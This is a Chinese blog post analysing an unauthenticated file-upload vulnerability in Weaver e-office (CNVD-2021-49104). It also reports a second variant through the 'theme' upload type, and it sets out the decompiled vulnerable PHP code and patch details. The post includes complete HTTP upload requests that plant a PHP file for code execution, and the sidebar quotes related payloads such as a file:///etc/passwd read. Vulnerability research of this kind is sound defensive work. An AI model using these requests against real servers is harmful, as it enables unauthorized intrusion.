记一次泛微漏洞分析到发现未公开新漏洞

已于 2023-02-09 09:58:31 修改
阅读量3.5k 收藏 2
点赞数
文章标签: web安全 安全 php
于 2022-01-10 18:26:24 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42508548/article/details/122416459
版权 
加入星球访问:https://t.zsxq.com/0ahB6Mw1P

引言

本文仅用于交流学习, 由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。

中华人民共和国网络安全法: https://www.cto.ac.cn/thread-106.htm

image.png

image.png

image.png

0x01 前言

本来想着分析分析泛微eoffice最新出的漏洞CNVD-2021-49104的,分析分析着,发现代码好像有别的方法也存在这样的漏洞,未授权getshell。一看补丁包,同步修复了这个漏洞。哎,食之无味弃之可惜,写一篇文章,安慰安慰自己。记录一下发现的时间。。。

image.png

0x02 环境搭建

下载安装包安装即可。

image.png

0x03 漏洞复现

1、无需登录,直接发包即可

POST /general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId= HTTP/1.1
Host: 10.211.55.3:8082
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Length: 192
Origin: http://10.211.55.3:8082
Connection: close
Referer: http://10.211.55.3:8082/login.php
Cookie: LOGIN_LANG=cn; PHPSESSID=715b458eb0c0227c9d9e23b81222880b
Content-Type: multipart/form-data; boundary=e64bdf16c554bbc109cecef6451c26a4
​
--e64bdf16c554bbc109cecef6451c26a4
Content-Disposition: form-data; name="Filedata"; filename="test.php"
Content-Type: image/jpeg
​
<?php phpinfo();?>
​
--e64bdf16c554bbc109cecef6451c26a4--

image.png

2、成功后访问http://10.211.55.3:8082/images/logo/logo-eoffice.php 可以看到执行成功。

image.png

0x04 漏洞分析

1、根据请求的路径 /general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId= 定位到文件:/webroot/general/index/UploadFile.php

2、打开乱码问题,搜索一下发现是使用了php zend进行加密

image.png

解密地址:php免费在线解密-PHP在线解密 上传加密文件,输入验证码便可以获取解密后的文件

image.png

获取的解密代码如下:

<?php
​
class UploadFile
{
    private static $_instance = NULL;
    private function __construct()
    {
    }
    private function __clone()
    {
    }
    public static function getInstance()
    {
        if (!self::$_instance instanceof self) {
            self::$_instance = new self();
        }
        return self::$_instance;
    }
    public function uploadPicture($connection)
    {
        if (!empty($_FILES)) {
            $tempFile = $_FILES['Filedata']['tmp_name'];
            $uploadType = $_REQUEST['uploadType'];
            if ($uploadType == "login_logo") {
                $targetPath = $_SERVER['DOCUMENT_ROOT'] . "/images/logo/";
                if (!file_exists($targetPath)) {
                    mkdir($targetPath, 511, true);
                }
                $ext = $this->getFileExtension($_FILES['Filedata']['name']);
                if (!in_array(strtolower($ext), array(".jpg", ".jpeg", ".png", ".gif"))) {
                    echo 3;
                    exit;
                }
                $_targetFile = "logo-login" . $ext;
                $targetFile = str_replace("//", "/", $targetPath) . "/" . $_targetFile;
                if (move_uploaded_file($tempFile, $targetFile)) {
                    $query = "UPDATE login_form SET LOGO='{$_targetFile}'";
                    $result = exequery($connection, $query);
                    if ($result) {
                        echo $_targetFile;
                    } else {
                        echo 0;
                    }
                } else {
                    echo 0;
                }
            } else {
                if ($uploadType == "login_bg") {
                    $targetPath = $_SERVER['DOCUMENT_ROOT'] . "/images/login-bg/";
                    $thumbPath = $_SERVER['DOCUMENT_ROOT'] . "/images/login-bg/thumb/";
                    if (!file_exists($targetPath)) {
                        mkdir($targetPath, 511, true);
                    }
                    if (!file_exists($thumbPath)) {
                        mkdir($thumbPath, 511, true);
                    }
                    $thumbs = scandir($thumbPath);
                    if (12 < sizeof($thumbs)) {
                        echo 2;
                        exit;
                    }
                    $ext = $this->getFileExtension($_FILES['Filedata']['name']);
                    if (!in_array(strtolower($ext), array(".jpg", ".jpeg", ".png", ".gif"))) {
                        echo 3;
                        exit;
                    }
                    $_targetFile = "theme-" . time() . $ext;
                    $targetFile = str_replace("//", "/", $targetPath) . "/" . $_targetFile;
                    $thumbFile = str_replace("//", "/", $thumbPath) . "/" . $_targetFile;
                    if (move_uploaded_file($tempFile, $targetFile)) {
                        if ($this->createThumb($targetFile, $thumbFile, $ext)) {
                            $query = "UPDATE login_form SET THEME='{$_targetFile}',THEME_THUMB='{$_targetFile}'";
                            $result = exequery($connection, $query);
                            echo 1;
                        } else {
                            echo 4;
                        }
                    } else {
                        echo 0;
                    }
                } else {
                    if ($uploadType == "theme") {
                        $targetPath = $_SERVER['DOCUMENT_ROOT'] . "/images/themes/";
                        if (!file_exists($targetPath)) {
                            mkdir($targetPath, 511, true);
                        }
                        $userId = $_GET['userId'];
                        $sql = "SELECT * FROM user WHERE USER_ID='{$userId}'";
                        $result = exequery($connection, $sql);
                        if ($ROW = mysql_fetch_array($result)) {
                            $themeImage = $ROW['THEME_IMG'];
                        }
                        $ext = $this->getFileExtension($_FILES['Filedata']['name']);
                        $_targetFile = md5(time()) . $ext;
                        $targetFile = str_replace("//", "/", $targetPath) . "/" . $_targetFile;
                        $oldFile = str_replace("//", "/", $targetPath) . "/" . $themeImage;
                        if (move_uploaded_file($tempFile, $targetFile)) {
                            $sql = "UPDATE user SET THEME_IMG='{$_targetFile}' WHERE USER_ID='{$userId}'";
                            $result = exequery($connection, $sql);
                            if ($result) {
                                if (file_exists($oldFile)) {
                                    unlink($oldFile);
                                }
                                $size = getimagesize($targetFile);
                                $themeWidth = $size[0];
                                $themeHeight = $size[1];
                                if (491 < $themeWidth) {
                                    $themeWidth = 491;
                                    $themeHeight = intval($themeHeight * (490 / $size[0]));
                                }
                                echo json_encode(array("name" => $_targetFile, "width" => $themeWidth, "height" => $themeHeight));
                            } else {
                                if (file_exists($targetFile)) {
                                    unlink($targetFile);
                                }
                                echo false;
                            }
                        } else {
                            echo false;
                        }
                    } else {
                        if ($uploadType == "eoffice_logo") {
                            $targetPath = $_SERVER['DOCUMENT_ROOT'] . "/images/logo/";
                            if (!file_exists($targetPath)) {
                                mkdir($targetPath, 511, true);
                            }
                            $ext = $this->getFileExtension($_FILES['Filedata']['name']);
                            $_targetFile = "logo-eoffice" . $ext;
                            $targetFile = str_replace("//", "/", $targetPath) . "/" . $_targetFile;
                            if (move_uploaded_file($tempFile, $targetFile)) {
                                $query = "SELECT * FROM sys_para WHERE PARA_NAME = 'SYS_LOGO'";
                                $result = exequery($connection, $query);
                                $row = mysql_fetch_array($result);
                                $param1 = $param2 = false;
                                if (!$row) {
                                    $query = "INSERT INTO sys_para VALUES('SYS_LOGO','{$_targetFile}')";
                                    $param1 = exequery($connection, $query);
                                } else {
                                    $query = "UPDATE sys_para SET PARA_VALUE='{$_targetFile}' WHERE PARA_NAME='SYS_LOGO'";
                                    $param1 = exequery($connection, $query);
                                }
                                $query = "SELECT * FROM sys_para WHERE PARA_NAME = 'SYS_LOGO_TYPE'";
                                $result = exequery($connection, $query);
                                $row = mysql_fetch_array($result);
                                if (!$row) {
                                    $query = "INSERT INTO sys_para VALUES('SYS_LOGO_TYPE','2')";
                                    $param2 = exequery($connection, $query);
                                } else {
                                    $query = "UPDATE sys_para SET PARA_VALUE='2' WHERE PARA_NAME='SYS_LOGO_TYPE'";
                                    $param2 = exequery($connection, $query);
                                }
                                if ($param1 && $param2) {
                                    echo $_targetFile;
                                } else {
                                    echo 0;
                                }
                            } else {
                                echo 0;
                            }
                        }
                    }
                }
            }
        }
    }
    public function getFileExtension($file)
    {
        $pos = strrpos($file, ".");
        $ext = substr($file, $pos);
        return $ext;
    }
    public function createThumb($targetFile, $thumbFile, $ext)
    {
        $dstW = 91;
        $dstH = 53;
        if (@imagecreatefromgif($targetFile)) {
            $src_image = imagecreatefromgif($targetFile);
        } else {
            if (@imagecreatefrompng($targetFile)) {
                $src_image = imagecreatefrompng($targetFile);
            } else {
                if (@imagecreatefromjpeg($targetFile)) {
                    $src_image = imagecreatefromjpeg($targetFile);
                }
            }
        }
        switch (strtolower($ext)) {
            case ".jpeg":
                $srcW = imagesx($src_image);
                $srcH = imagesy($src_image);
                $dst_image = imagecreatetruecolor($dstW, $dstH);
                imagecopyresized($dst_image, $src_image, 0, 0, 0, 0, $dstW, $dstH, $srcW, $srcH);
                return imagejpeg($dst_image, $thumbFile);
            case ".png":
                $srcW = imagesx($src_image);
                $srcH = imagesy($src_image);
                $dst_image = imagecreatetruecolor($dstW, $dstH);
                imagecopyresized($dst_image, $src_image, 0, 0, 0, 0, $dstW, $dstH, $srcW, $srcH);
                return imagepng($dst_image, $thumbFile);
            case ".jpg":
                $srcW = imagesx($src_image);
                $srcH = imagesy($src_image);
                $dst_image = imagecreatetruecolor($dstW, $dstH);
                imagecopyresized($dst_image, $src_image, 0, 0, 0, 0, $dstW, $dstH, $srcW, $srcH);
                return imagejpeg($dst_image, $thumbFile);
            case ".gif":
                $srcW = imagesx($src_image);
                $srcH = imagesy($src_image);
                $dst_image = imagecreatetruecolor($dstW, $dstH);
                imagecopyresized($dst_image, $src_image, 0, 0, 0, 0, $dstW, $dstH, $srcW, $srcH);
                return imagegif($dst_image, $thumbFile);
                break;
            default:
                break;
        }
    }
}
include_once "inc/conn.php";
$upload = UploadFile::getinstance();
$method = $_GET['m'];
$upload->{$method}($connection);

3、首先第4-217行属于类UploadFile,这里可以先不看。从第218行开始执行代码,首先,定义类对象,对象执行m传入的方法。

include_once "inc/conn.php";
$upload = UploadFile::getinstance();
$method = $_GET['m'];
$upload->{$method}($connection);

4、根据请求: m=uploadPicture&uploadType=eoffice_logo&userId= 定位到方法uploadPicture

image.png

5、首先检测$_FILES是否为空,不为空,进去条件分支语句。在第23行,看到了uploadType,这里传入的是eoffice_logo,定位到代码122行。(我会在代码注释中放上分析)

image.png

if ($uploadType == "eoffice_logo") {
              //定义上传路径
                            $targetPath = $_SERVER['DOCUMENT_ROOT'] . "/images/logo/";
                            //检测"/images/logo/"路径是否存在
                            if (!file_exists($targetPath)) {
                                mkdir($targetPath, 511, true);
                            }
                            //通过getFileExtension方法提取后缀
                            $ext = $this->getFileExtension($_FILES['Filedata']['name']);
                            //直接拼接后缀
                            $_targetFile = "logo-eoffice" . $ext;
                            //将"//"替换成"/"
                            $targetFile = str_replace("//", "/", $targetPath) . "/" . $_targetFile;
                            //调用move_uploaded_file方法,检测文件是否合法
                            if (move_uploaded_file($tempFile, $targetFile)) {
                                $query = "SELECT * FROM sys_para WHERE PARA_NAME = 'SYS_LOGO'";
                                $result = exequery($connection, $query);
                                $row = mysql_fetch_array($result);
                                $param1 = $param2 = false;
                                //如果文件不存在,使用insert插入文件
                                if (!$row) {
                                    $query = "INSERT INTO sys_para VALUES('SYS_LOGO','{$_targetFile}')";
                                    $param1 = exequery($connection, $query);
                                } else {
                                //如果文件存在,则使用update更新文件
                                    $query = "UPDATE sys_para SET PARA_VALUE='{$_targetFile}' WHERE PARA_NAME='SYS_LOGO'";
                                    $param1 = exequery($connection, $query);
                                }
                                $query = "SELECT * FROM sys_para WHERE PARA_NAME = 'SYS_LOGO_TYPE'";
                                $result = exequery($connection, $query);
                                $row = mysql_fetch_array($result);
                                if (!$row) {
                                    $query = "INSERT INTO sys_para VALUES('SYS_LOGO_TYPE','2')";
                                    $param2 = exequery($connection, $query);
                                } else {
                                    $query = "UPDATE sys_para SET PARA_VALUE='2' WHERE PARA_NAME='SYS_LOGO_TYPE'";
                                    $param2 = exequery($connection, $query);
                                }
                                if ($param1 && $param2) {
                                    echo $_targetFile;
                                } else {
                                    echo 0;
                                }
                            } else {
                                echo 0;
                            }
                        }

可以看到检测路径、提取路径,提取后缀等

image.png

后面直接执行了数据库语句进行文件的更新或插入操作。

image.png

6、getFileExtension方法在下面,其实就是以点来分割后缀。

image.png

exequery方法在include_once引用的 "inc/conn.php"文件中,可以看到也没有进行过滤。

image.png

7、回到原来的UploadFile.php文件,往下有个createThumb方法,可以看到这里是有进行后缀检测的

image.png

8、全局搜索一下,发现当uploadType="login_bg"时调用了它,这里上传会检测后缀

image.png

9、再往前看,发现当uploadType="login_logo"时设置了白名单后缀

image.png

10、下面还有一个当uploadType="theme"的时候执行的代码,简单看了一下,居然没有进行过滤

image.png

11、然后,就发现了一个新的未公开的漏洞,在上面的theme方法

POST /general/index/UploadFile.php?m=uploadPicture&uploadType=theme&userId=1 HTTP/1.1
Host: 10.211.55.3:8082
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Length: 192
Origin: http://10.211.55.3:8082
Connection: close
Referer: http://10.211.55.3:8082/login.php
Cookie: LOGIN_LANG=cn; PHPSESSID=715b458eb0c0227c9d9e23b81222880b
Content-Type: multipart/form-data; boundary=e64bdf16c554bbc109cecef6451c26a4
​
--e64bdf16c554bbc109cecef6451c26a4
Content-Disposition: form-data; name="Filedata"; filename="test.php"
Content-Type: image/jpeg
​
<?php phpinfo();?>
​
--e64bdf16c554bbc109cecef6451c26a4--

image.png

image.png

12、下载了补丁包,发现都设置了上传后缀白名单,并且加了个过滤器。目前泛微官方已发布此漏洞的软件更新,建议受影响用户尽快升级到安全版本。 官方链接如下:http://v10.e-office.cn/eoffice9update/safepack.zip theme

image.png

eoffice_logo

image.png

0x05 总结

本来想好好写篇分析文章的,现在还发现了一个未公开的漏洞利用poc,搞得有点尴尬,哎,食之无味弃之可惜~ 也希望安全厂商在进行waf规则处理的时候,记得将uploadType=theme也加上,最后扯一句,本篇内容仅用于信息防御技术学习,未经许可不允许进行非授权测试,谢谢合作。 也希望受影响的用户尽快升级到安全版本。 官方补丁下载链接如下:http://v10.e-office.cn/eoffice9update/safepack.zip

大夜猫
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
-云桥e-Bridge SQL注入漏洞复现
0xSec
12-12 1357
由于-云桥e-Bridge平台/taste/addTaste接口处存在SQL注入漏洞经身份认证的攻击者可以通过此漏洞获取数据库权限,获取用户密码等重要凭据,使系统处于极不安全状态。
漏洞汇总
qq_39541626的博客
05-09 6821
SQL注入 前台SQL注入 用户名:admin’ or password like ‘c4ca4238a0b923820dcc509a6f75849b’ and ‘a’='a 密码: 1 验证页面参数 - loginid (1)/login/VerifyLogin.jsp?loginfile=%2Fwui%2Ftheme%2Fecology7%2Fpage%2Flogin.jsp%3FtemplateId%3D41%26logintype%3D1%26gopage%3D&logintype=1&am
漏洞复现】e-Mobile 移动管理平台文件上传漏洞
qq_34780861的博客
04-25 1061
e-Mobile移动管理平台是一款由软件开发的企业移动办公解决方案。它提供了一系列的功能和工具,使企业员工能够通过移动设备随时随地地进行办公和协作。e-Mobile 移动管理平台存在任意文件上传漏洞
云桥e-Bridge-任意文件读取漏洞
chaojixiaojingang
10-09 6389
1.资产查找 Fofa: title="云桥 e-Bridge" 2.漏洞描述 云桥e-Bridge存在任意文件读取漏洞,攻击者成功利用该漏洞,可实现任意文件读取,获取敏感信息。 3.漏洞复现 1)Linux服务器 (1)在URL后添加payload payload:/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt (2)在URL后添加/file/fileNo
【复现】云桥 e-Bridge SQL注入漏洞_45
fushuang333的博客
02-10 843
【复现】云桥 e-Bridge SQL注入漏洞,攻击者经授权可以访问数据库中的数据,盗取用户的隐私以及个人信息,造成用户的信息泄露。
漏洞复现-云桥 e-Bridge SQL注入(附漏洞检测脚本)
jjjj1029056414的博客
12-12 1192
漏洞复现-云桥 e-Bridge SQL注入,附带自己写的poc脚本
E-Office10远程代码执行漏洞
05-06
E-Office 10确实存在远程代码执行漏洞,这个漏洞**可能导致严重的安全后果**。 该漏洞的关键在于系统处理上传的PHAR文件时存在的缺陷。攻击者能够上传伪装的PHAR文件到服务器,利用PHP处理PHAR文件时自动进行的...
OA xmlrpcServlet接口任意文件读取漏洞(CNVD-2022-43245)
12-25
OA xmlrpcServlet接口任意文件读取漏洞(CNVD-2022-43245),可以指定文件路径进行读取,并提供检测方案
e-cology OA Beanshell组件远程代码执行漏洞批量检测脚本
09-26
对2019年9月爆的e-cology OA Beanshell组件远程代码执行漏洞进行漏洞检测。 使用方法: 1、运行url存活检测脚本e-cology_OA_rce.py批量定位OA业务。 e-cology_OA_rce.py –t 1.txt 2、运行检测脚本判断...
OA性能分析文件。
08-08
OA性能分析文件
(附nuclei yaml文件)E-office 10 atuh-filephar反序列化命令执行漏洞复现(QVD-2024-11354)
最新发布
nglj9527的博客
05-27 735
E-Offiсе10是一款企业级办公自动化系统,主要用于优化和管理企业的文档、信息流转、协作与沟通工作流程。E-Offiсе10存在远程代码执行漏洞。由于系统处理上传的PHAR文件时存在缺陷,经身份验证的远程攻击者能够上传伪装的PHAR文件到服务器,利用PHP处理PHAR文件时自动进行的反序列化机制来触发远程代码执行。
云桥任意文件读取漏洞复现[09/18]
weixin_39811856的博客
09-18 1350
1.老规矩,搜寻目标机器(xpath用起来确实很方便) 2.根据网上的POC试试: GET /wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt HTTP/1.1 User-Agent: curl/7.29.0 Host: xxxxx Accept: */* 3.根据收集到的IP,手动是真滴麻烦,写个小脚本再筛选一遍: 发现这个好像有戏,没有/etc/passwd,并且还是
漏洞复现--E-Office 10任意文件上传漏洞
qq_53003652的博客
10-07 2380
E-Office 10在 10.0_20230821 版本之前存在远程代码执行漏洞,该漏洞是通过文件上传配合文件包含实现远程代码执行,攻击者可利用此漏洞上传恶意文件并控制服务器。长亭应急团队经过分析发现漏洞是通过文件上传配合文件包含实现远程代码执行。近期,长亭科技监测到官方发布了补丁修复了一处远程代码执行漏洞
E-Office前台文件上传漏洞
失心少年
06-20 849
我们在第108行调用doc2text(),然后追溯到doc2txt()参数$FILE_PATH的源,连接附件目录(C:\eoffice9\webroot\ATTACHMENT) 的数据表FLE_CONTENT中ATTACHMENT_ID和ATTACHMENT_NAME列的值,以获得完整的文件路径。天擎攻防实验室的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。
2021-OA V8 SQL注入漏洞
热门推荐
weixin_43227251的博客
04-13 1万+
OA V8 SQL注入漏洞 漏洞描述 OA V8 存在SQL注入漏洞,攻击者可以通过漏洞获取管理员权限和服务器权限 漏洞影响 OA V8 FOFA app=“-协同办公OA” 漏洞复现 在getdata.jsp中,直接将request对象交给 weaver.hrm.common.AjaxManager.getData(HttpServletRequest, ServletContext) : 方法处理 在getData方法中,判断请求里cmd参数是否为空,如果不为空,调用proc方法 P
e-Bridge授权文件读取漏洞复现
The current road is different, love needs to distinguish between right and wrong
03-05 7451
简介 云桥 e-Bridge 存在经授权读取任意文件漏洞,可利用该漏洞,实现任意文件读取,获取敏感信息。 fofa title="云桥e-Bridge" 漏洞复现 因为不是在本地搭建的漏洞复现环境,利用空间搜索引擎只找到很少量存在漏洞的网站,大多数都开启了身份验证,找到的也都是基于Windows的,所以就不在介绍Linux上搭建的了。 payload1 /wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///
云桥知识社区
weixin_34344403的博客
07-06 777
云桥知识社区 https://yq.weaver.com.cn/eb/qa/view/#/subject/25f0cdb1740448d4b46264b304021038网名:浩秦; 邮箱:root#landv.pw; 只要我能控制一個國家的貨幣發行,我不在乎誰制定法律。金錢一旦作響,壞話隨之戛然而止。 ...
CNVD-2021-49104——E-Office文件上传漏洞
LiBai'S BLOG
11-28 8351
CNVD-2021-49104漏洞描述危害等级FOFA 语法影响版本漏洞复现修复建议 漏洞描述 e-office是旗下的一款标准协同移动办公平台。由于 e-office 能正确处理上传模块中的用户输入,攻击者可以通过该漏洞构造恶意的上传数据包,最终实现任意代码执行。 危害等级 高危 文件上传可直接get webshell FOFA 语法 app="-EOffice" 影响版本 e-office V9.0 漏洞复现 构造请求上传文件即可 POST /general/index/U
oabeanshell漏洞分析
09-05
OABeanShell漏洞是指OA系统中的一个安全漏洞OA是一套常用的企业级办公自动化系统,用于管理企业的各种办公流程。这个漏洞是由于系统中的某个组件对外部用户提供了BeanShell脚本的执行功能,并没有进行...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值